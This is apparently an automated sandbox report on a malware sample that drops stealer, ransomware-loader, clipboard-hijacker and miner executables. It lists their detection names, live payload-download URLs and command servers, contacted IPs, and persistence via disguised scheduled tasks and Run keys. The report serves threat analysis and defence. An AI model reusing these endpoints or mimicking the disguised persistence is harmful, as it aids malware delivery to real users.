C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build2[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\759F.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\C2B9.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\86ED.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\wujthgj	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\D5B9.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\67F2.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\6C74.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\DF46.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\E9C7.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\6000.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\F09E.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\11.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\F86F.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\rrjthgj	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build2[1].exe	58%	ReversingLabs	Win32.Trojan.RedLine
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exe	88%	ReversingLabs	Win32.Trojan.ClipBanker
C:\Users\user\AppData\Local\Temp\6000.exe	50%	ReversingLabs	Win32.Trojan.CrypterX
C:\Users\user\AppData\Local\Temp\6C74.exe	50%	ReversingLabs	Win32.Trojan.CrypterX
C:\Users\user\AppData\Local\Temp\759F.exe	50%	ReversingLabs	Win32.Trojan.CrypterX
C:\Users\user\AppData\Local\Temp\86ED.exe	83%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\9B15.exe	83%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\AF5C.exe	83%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\D5B9.exe	75%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
C:\Users\user\AppData\Local\Temp\DF46.exe	83%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\E8B1.exe	83%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\F09E.exe	50%	ReversingLabs	Win32.Trojan.CrypterX
C:\Users\user\AppData\Local\Temp\F86F.exe	75%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
C:\Users\user\AppData\Local\Temp\XandETC.exe	73%	ReversingLabs	Win64.Coinminer.Xmrig
C:\Users\user\AppData\Local\Temp\aafg31.exe	35%	ReversingLabs	Win64.Adware.RedCap
C:\Users\user\AppData\Local\Temp\oldplayer.exe	96%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	58%	ReversingLabs	Win32.Trojan.RedLine
C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build3.exe	88%	ReversingLabs	Win32.Trojan.ClipBanker
C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe	50%	ReversingLabs	Win32.Trojan.CrypterX
C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	88%	ReversingLabs	Win32.Trojan.ClipBanker
C:\Users\user\AppData\Roaming\rrjthgj	46%	ReversingLabs	Win32.Trojan.CrypterX

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
toobussy.com	12%	Virustotal	Browse
colisumy.com	24%	Virustotal	Browse
astoriaresidency.com	6%	Virustotal	Browse
potunulit.org	25%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://potunulit.org/	0%	URL Reputation	safe
http://schemas.m	0%	URL Reputation	safe
https://shsplatform.co.uk/tmp/index.php	0%	URL Reputation	safe
http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro	0%	URL Reputation	safe
http://colisumy.com/dl/build2.exe$run	100%	URL Reputation	malware
http://soryytlic4.net/	0%	URL Reputation	safe
http://zexeq.com/lancer/get.php	0%	URL Reputation	safe
http://zexeq.com/files/1/build3.exe$run	100%	URL Reputation	malware
http://novanosa5org.org/	0%	URL Reputation	safe
http://golilopaster.org/	0%	URL Reputation	safe
http://zexeq.com/raud/get.php	100%	URL Reputation	malware
http://bulimu55t.net/	0%	URL Reputation	safe
http://colisumy.com/dl/build.exe	100%	URL Reputation	malware
http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov	0%	URL Reputation	safe
http://colisumy.com/dl/build2.exe	100%	URL Reputation	malware
http://hujukui3.net/	0%	URL Reputation	safe
http://toobussy.com/tmp/	0%	URL Reputation	safe
http://www.wikipedia.com/	0%	URL Reputation	safe
http://bukubuka1.net/	0%	URL Reputation	safe
http://zexeq.com/files/1/build3.exe	0%	URL Reputation	safe
http://newzelannd66.org/	0%	URL Reputation	safe
http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error	0%	Avira URL Cloud	safe
https://we.tl/t-vKvLYNOV	0%	Avira URL Cloud	safe
https://astoriaresidency.com/tmp/index.php	0%	Avira URL Cloud	safe
https://we.tl/t-vKvLYNOV9o	0%	Avira URL Cloud	safe
http://5.75.213.102:22022/153ce668f1e21829c936c2b11fa4d869	0%	Avira URL Cloud	safe
http://zexeq.com/raud/get.phpep	100%	Avira URL Cloud	malware
http://45.9.74.80/wall.exe	100%	Avira URL Cloud	malware
http://zexeq.com/	100%	Avira URL Cloud	malware
http://5.75.213.102:22022/upload.zip	0%	Avira URL Cloud	safe
http://zexeq.com/raud/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C&first=true	100%	Avira URL Cloud	malware
http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe0	100%	Avira URL Cloud	malware
5.42.65.80/8bmeVwqx/index.php	100%	Avira URL Cloud	malware
http://5.75.213.102:22022/	0%	Avira URL Cloud	safe
http://zexeq.com/-98D0-4585-A1ED-B2838757AE1B	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
toobussy.com	190.224.203.37	true	true	12%, Virustotal, Browse	unknown
colisumy.com	37.34.248.24	true	true	24%, Virustotal, Browse	unknown
astoriaresidency.com	103.233.24.19	true	true	6%, Virustotal, Browse	unknown
potunulit.org	188.114.96.7	true	true	25%, Virustotal, Browse	unknown
t.me	149.154.167.99	true	false		high
api.2ip.ua	162.0.217.254	true	false		high
shsplatform.co.uk	80.66.203.53	true	true		unknown
zexeq.com	77.28.83.241	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://potunulit.org/	true	URL Reputation: safe	unknown
5.42.65.80/8bmeVwqx/index.php	true	Avira URL Cloud: malware	low
https://shsplatform.co.uk/tmp/index.php	true	URL Reputation: safe	unknown
http://soryytlic4.net/	true	URL Reputation: safe	unknown
http://zexeq.com/lancer/get.php	true	URL Reputation: safe	unknown
http://5.75.213.102:22022/153ce668f1e21829c936c2b11fa4d869	false	Avira URL Cloud: safe	unknown
http://novanosa5org.org/	true	URL Reputation: safe	unknown
https://astoriaresidency.com/tmp/index.php	true	Avira URL Cloud: safe	unknown
http://golilopaster.org/	true	URL Reputation: safe	unknown
https://t.me/headlist	false		high
http://bulimu55t.net/	true	URL Reputation: safe	unknown
http://5.75.213.102:22022/upload.zip	false	Avira URL Cloud: safe	unknown
http://colisumy.com/dl/build.exe	true	URL Reputation: malware	unknown
http://zexeq.com/raud/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C&first=true	true	Avira URL Cloud: malware	unknown
http://colisumy.com/dl/build2.exe	true	URL Reputation: malware	unknown
http://45.9.74.80/wall.exe	true	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199235044780	false		high
https://api.2ip.ua/geo.json	false		high
http://5.75.213.102:22022/	false	Avira URL Cloud: safe	unknown
http://hujukui3.net/	true	URL Reputation: safe	unknown
http://toobussy.com/tmp/	true	URL Reputation: safe	unknown
http://bukubuka1.net/	true	URL Reputation: safe	unknown
http://zexeq.com/files/1/build3.exe	true	URL Reputation: safe	unknown
http://newzelannd66.org/	true	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.2ip.ua/cK~	759F.exe, 0000000E.00000002.503214555.0000000000961000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 0000000E.00000003.500060099.000000000095F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonHf	759F.exe, 00000006.00000002.450044131.0000000000687000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsona_	9B15.exe, 0000001A.00000002.480583823.0000000000927000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.m	6C74.exe, 0000000C.00000002.457202907.00000000006ED000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.2ip.ua/geo.jsonZ/	759F.exe, 00000011.00000002.455817326.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 00000011.00000003.454348016.000000000075C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonzO	759F.exe, 00000011.00000002.455706179.0000000000718000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonA5	86ED.exe, 0000001B.00000002.479544500.0000000000647000.00000004.00000020.00020000.00000000.sdmp	false		high
http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro	explorer.exe, 00000001.00000000.379122239.00007FFC1B439000.00000002.00000001.01000000.00000005.sdmp	false	URL Reputation: safe	unknown
http://colisumy.com/dl/build2.exe$run	6C74.exe, 00000018.00000002.618961706.0000000000884000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://api.2ip.ua/geo.json-	E8B1.exe, 0000001D.00000002.476339499.0000000000647000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.json/	9B15.exe, 0000001A.00000002.480583823.0000000000927000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.json3r=	759F.exe, 00000020.00000002.489628631.0000000000748000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.amazon.com/	6C74.exe, 00000018.00000003.489494423.0000000003170000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.2ip.ua/YI	759F.exe, 00000006.00000002.450044131.0000000000687000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.json(	759F.exe, 00000020.00000002.489628631.0000000000748000.00000004.00000020.00020000.00000000.sdmp	false		high
http://zexeq.com/files/1/build3.exe$run	6C74.exe, 00000018.00000002.618961706.0000000000884000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://api.2ip.ua/geo.jsonMcp	759F.exe, 00000020.00000002.489628631.0000000000791000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 00000020.00000003.480302311.0000000000790000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.twitter.com/	6C74.exe, 00000018.00000003.490026604.0000000003170000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.json&	AF5C.exe, 00000017.00000002.462314714.00000000005B7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.json9:	86ED.exe, 0000001B.00000002.479544500.0000000000647000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.openssl.org/support/faq.html	759F.exe, 00000020.00000002.481989868.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error	759F.exe, 00000005.00000002.441041476.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, 759F.exe, 00000006.00000002.449394401.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 759F.exe, 00000008.00000002.500232401.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, 6C74.exe, 0000000A.00000002.448562068.0000000002330000.00000040.00001000.00020000.00000000.sdmp, 6C74.exe, 0000000C.00000002.456725641.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 759F.exe, 0000000E.00000002.501769020.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 759F.exe, 00000010.00000002.452421978.0000000002250000.00000040.00001000.00020000.00000000.sdmp, 759F.exe, 00000011.00000002.455189510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, AF5C.exe, 00000014.00000002.461647833.0000000002740000.00000040.00001000.00020000.00000000.sdmp, 6C74.exe, 00000015.00000002.462688817.0000000002330000.00000040.00001000.00020000.00000000.sdmp, 9B15.exe, 00000016.00000002.473987426.0000000002660000.00000040.00001000.00020000.00000000.sdmp, AF5C.exe, 00000017.00000002.461927815.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6C74.exe, 00000018.00000002.618498812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 86ED.exe, 00000019.00000002.475860220.0000000002700000.00000040.00001000.00020000.00000000.sdmp, 9B15.exe, 0000001A.00000002.475638088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 86ED.exe, 0000001B.00000002.473184693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E8B1.exe, 0000001C.00000002.478959888.00000000028F0000.00000040.00001000.00020000.00000000.sdmp, E8B1.exe, 0000001D.00000002.475621372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 759F.exe, 0000001E.00000002.477291278.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, 6000.exe, 0000001F.00000002.485496524.0000000002280000.00000040.00001000.00020000.00000000.sdmp, 759F.exe, 00000020.00000002.481989868.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://api.2ip.ua/geo.jsonx	E8B1.exe, 0000001D.00000002.476339499.0000000000647000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonAnX	86ED.exe, 0000001B.00000002.479544500.0000000000647000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonzn	86ED.exe, 0000001B.00000002.479544500.0000000000647000.00000004.00000020.00020000.00000000.sdmp	false		high
https://we.tl/t-vKvLYNOV	6C74.exe, 00000018.00000002.619618353.0000000003073000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://api.2ip.ua/geo.jsonq	759F.exe, 00000011.00000002.455706179.000000000073F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://we.tl/t-vKvLYNOV9o	6C74.exe, 00000018.00000002.618961706.00000000008C2000.00000004.00000020.00020000.00000000.sdmp, 6C74.exe, 00000018.00000002.619618353.0000000003073000.00000004.00000020.00020000.00000000.sdmp, 6C74.exe, 00000018.00000002.618961706.0000000000884000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://zexeq.com/raud/get.php	6C74.exe, 00000018.00000002.618961706.0000000000884000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://api.2ip.ua/geo.jsons3H/m	759F.exe, 00000011.00000002.455706179.0000000000718000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonw_	9B15.exe, 0000001A.00000002.480583823.0000000000927000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.reddit.com/	6C74.exe, 00000018.00000003.489980811.0000000003170000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonnn	86ED.exe, 0000001B.00000002.479544500.0000000000647000.00000004.00000020.00020000.00000000.sdmp	false		high
http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe0	6C74.exe, 00000018.00000002.618961706.0000000000884000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://api.2ip.ua/y	759F.exe, 00000011.00000002.455817326.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 00000011.00000003.454348016.000000000075C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000001.00000000.373438154.000000000F270000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsondllB	759F.exe, 00000020.00000002.489628631.0000000000748000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.nytimes.com/	6C74.exe, 00000018.00000003.489939805.0000000003170000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.2ip.ua/	759F.exe, 00000006.00000002.450044131.0000000000687000.00000004.00000020.00020000.00000000.sdmp, 6C74.exe, 0000000C.00000003.449851407.000000000068E000.00000004.00000020.00020000.00000000.sdmp, 6C74.exe, 0000000C.00000002.457202907.0000000000647000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 0000000E.00000002.503214555.0000000000961000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 0000000E.00000003.500060099.000000000095F000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 00000011.00000002.455817326.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 00000011.00000003.454348016.000000000075C000.00000004.00000020.00020000.00000000.sdmp, AF5C.exe, 00000017.00000002.462314714.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, 6C74.exe, 00000018.00000003.461708895.0000000000842000.00000004.00000020.00020000.00000000.sdmp, 6C74.exe, 00000018.00000002.618961706.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, 86ED.exe, 0000001B.00000002.479544500.0000000000647000.00000004.00000020.00020000.00000000.sdmp, E8B1.exe, 0000001D.00000002.476339499.000000000068C000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 00000020.00000002.489628631.0000000000791000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 00000020.00000003.480302311.0000000000790000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonZ	E8B1.exe, 0000001D.00000002.476339499.0000000000647000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonU	6C74.exe, 0000000C.00000002.457202907.0000000000647000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/c	E8B1.exe, 0000001D.00000002.476339499.000000000068C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonV	759F.exe, 00000020.00000002.489628631.0000000000748000.00000004.00000020.00020000.00000000.sdmp	false		high
http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov	explorer.exe, 00000001.00000000.379122239.00007FFC1B439000.00000002.00000001.01000000.00000005.sdmp	false	URL Reputation: safe	unknown
http://zexeq.com/	6C74.exe, 00000018.00000002.618961706.0000000000884000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://api.2ip.ua/geo.jsonh	759F.exe, 0000000E.00000002.503130852.0000000000942000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonj	AF5C.exe, 00000017.00000002.462314714.00000000005B7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonf	E8B1.exe, 0000001D.00000002.476339499.0000000000647000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsona	759F.exe, 00000020.00000002.489628631.0000000000748000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonc	759F.exe, 0000000E.00000002.503130852.0000000000918000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonkn	759F.exe, 0000000E.00000002.503214555.0000000000961000.00000004.00000020.00020000.00000000.sdmp, 759F.exe, 0000000E.00000003.500060099.000000000095F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://zexeq.com/raud/get.phpep	6C74.exe, 00000018.00000002.618961706.0000000000884000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://api.2ip.ua/geo.jsoninp	86ED.exe, 0000001B.00000002.479544500.0000000000647000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.youtube.com/	6C74.exe, 00000018.00000003.490127284.0000000003170000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.json0	759F.exe, 0000000E.00000002.503130852.0000000000942000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonal.	E8B1.exe, 0000001D.00000002.476339499.0000000000647000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/5q	9B15.exe, 0000001A.00000002.480583823.000000000096C000.00000004.00000020.00020000.00000000.sdmp, 9B15.exe, 0000001A.00000003.463872681.000000000096B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonM	6C74.exe, 0000000C.00000002.457202907.0000000000647000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/oqH	9B15.exe, 0000001A.00000002.480583823.000000000096C000.00000004.00000020.00020000.00000000.sdmp, 9B15.exe, 0000001A.00000003.463872681.000000000096B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.wikipedia.com/	6C74.exe, 00000018.00000003.490091904.0000000003170000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.live.com/	6C74.exe, 00000018.00000003.489878035.0000000003170000.00000004.00001000.00020000.00000000.sdmp	false		high
http://zexeq.com/-98D0-4585-A1ED-B2838757AE1B	6C74.exe, 00000018.00000002.618961706.0000000000884000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://api.2ip.ua/geo.jsonJ	AF5C.exe, 00000017.00000002.462314714.00000000005B7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonD	6C74.exe, 00000018.00000003.461708895.0000000000842000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.google.com/	6C74.exe, 00000018.00000003.489713878.0000000003170000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.json6H(m	759F.exe, 00000011.00000002.455706179.0000000000718000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
37.34.248.24	colisumy.com	Kuwait	42961	GPRS-ASZAINKW	true
123.140.161.243	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	true
5.75.213.102	unknown	Germany	24940	HETZNER-ASDE	false
80.66.203.53	shsplatform.co.uk	United Kingdom	61323	UKFASTGB	true
211.168.53.110	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	true
77.28.83.241	zexeq.com	Macedonia	6821	MT-AS-OWNbulOrceNikolovbbMK	true
190.219.153.101	unknown	Panama	18809	CableOndaPA	true
187.251.132.139	unknown	Mexico	18592	CorporacionUniversitariaparaelDesarrollodeInternetA	true
45.9.74.80	unknown	Russian Federation	200740	FIRST-SERVER-EU-ASRU	true
103.233.24.19	astoriaresidency.com	India	133296	WEBWERKS-AS-INWebWerksIndiaPvtLtdIN	true
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false
188.114.96.7	potunulit.org	European Union	13335	CLOUDFLARENETUS	true
177.254.85.20	unknown	Colombia	27831	ColombiaMovilCO	true
211.119.84.112	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	true
162.0.217.254	api.2ip.ua	Canada	35893	ACPCA	false
190.224.203.37	toobussy.com	Argentina	7303	TelecomArgentinaSAAR	true
189.143.161.89	unknown	Mexico	8151	UninetSAdeCVMX	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	37.1.0 Beryl
Analysis ID:	891767
Start date and time:	2023-06-21 04:26:06 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	43
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	file.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@74/315@61/18
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 63.8% (good quality ratio 58.5%) Quality average: 76.1% Quality standard deviation: 32.4%
HCA Information:	Successful, ratio: 100% Number of executed functions: 39 Number of non-executed functions: 39
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, consent.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): login.live.com, as.imgjeoigaa.com, us.imgjeoigaa.com, watson.telemetry.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:27:09	API Interceptor	669x Sleep call for process: explorer.exe modified
04:27:36	Task Scheduler	Run new task: Firefox Default Browser Agent 783DB3267B07930A path: C:\Users\user\AppData\Roaming\rrjthgj
04:27:40	Task Scheduler	Run new task: Time Trigger Task path: C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe s>--Task
04:27:41	API Interceptor	1x Sleep call for process: dllhost.exe modified
04:27:44	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe" --AutoStart
04:27:54	API Interceptor	1x Sleep call for process: 6C74.exe modified
04:27:54	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe" --AutoStart
04:27:58	Task Scheduler	Run new task: Azure-Update-Task path: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
04:28:06	Task Scheduler	Run new task: oneetx.exe path: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe
04:28:07	API Interceptor	1x Sleep call for process: build2.exe modified
04:28:14	Task Scheduler	Run new task: Firefox Default Browser Agent 802A625278DD7712 path: C:\Users\user\AppData\Roaming\wujthgj
04:28:54	Task Scheduler	Run new task: NoteUpdateTaskMachineQC path: C:\Program Files\Notepad\Chrome\updater.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37.34.248.24	file.exe	Get hash	malicious	Clipboard Hijacker, Djvu	Browse	zexeq.com/files/1/build3.exe
	ArfO1dskin.exe	Get hash	malicious	RHADAMANTHYS, SmokeLoader	Browse	aapu.at/tmp/
	01575799.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, HTMLPhisher	Browse	zexeq.com/files/1/build3.exe
	32332577.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, SmokeLoader, Stealc, Vidar	Browse	colisumy.com/dl/build.exe
	editor327.exe	Get hash	malicious	Clipboard Hijacker, Djvu	Browse	zexeq.com/files/1/build3.exe
	router804.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	zexeq.com/test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4
	32332.exe	Get hash	malicious	Babuk, Djvu	Browse	zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
	smokeloader.exe	Get hash	malicious	SmokeLoader	Browse	aapu.at/tmp/
	setup.exe	Get hash	malicious	Amadey, SmokeLoader	Browse	aapu.at/tmp/
	setup.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	colisumy.com/dl/build2.exe
	setup.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	zexeq.com/files/1/build3.exe
	SecuriteInfo.com.Variant.Zusy.457078.3413.2831.exe	Get hash	malicious	RHADAMANTHYS, RedLine, SmokeLoader	Browse	aapu.at/tmp/
	tXbqdomQ7w.exe	Get hash	malicious	RHADAMANTHYS, SmokeLoader	Browse	aapu.at/tmp/
	rJJIAaCNt8.exe	Get hash	malicious	RHADAMANTHYS, SmokeLoader	Browse	aapu.at/tmp/
	setup.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, HTMLPhisher, Vidar, Zorab	Browse	uaery.top/dl/build2.exe
